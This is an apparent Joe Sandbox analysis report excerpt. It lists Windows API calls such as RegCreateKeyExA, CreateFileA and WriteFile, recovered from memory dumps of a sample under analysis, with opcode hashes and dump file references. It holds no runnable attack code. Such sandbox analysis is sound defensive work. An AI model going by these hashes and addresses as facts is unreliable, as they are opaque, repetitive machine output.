                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                      • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                      • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                      • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                      APIs
                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 1306739567-0
                                                                                                      • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                      • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                      • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                      • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                      APIs
                                                                                                      • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExtentPointText
                                                                                                      • String ID:
                                                                                                      • API String ID: 566491939-0
                                                                                                      • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                      • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                      • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                      • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                      • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                      • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                      • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                      • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                      • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                      • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                      APIs
                                                                                                      • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                      • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                      • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                      • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                      • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                      • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                      • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                      • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                      • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                      • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                      APIs
                                                                                                        • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                      • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                        • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoParametersSystem$ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3202724764-0
                                                                                                      • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                      • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                      • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                      • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                      APIs
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: TextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 530164218-0
                                                                                                      • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                      • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                      • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                      • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                      • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                      • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                      • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                      • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                      • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                      • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                      • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                      • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                      • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                        • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 734332943-0
                                                                                                      • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                      • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                      • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                      • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                      APIs
                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611563598-0
                                                                                                      • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                      • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                      • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                      • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                      • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                      • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                      • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DestroyWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3375834691-0
                                                                                                      • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                      • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                      • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                      • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
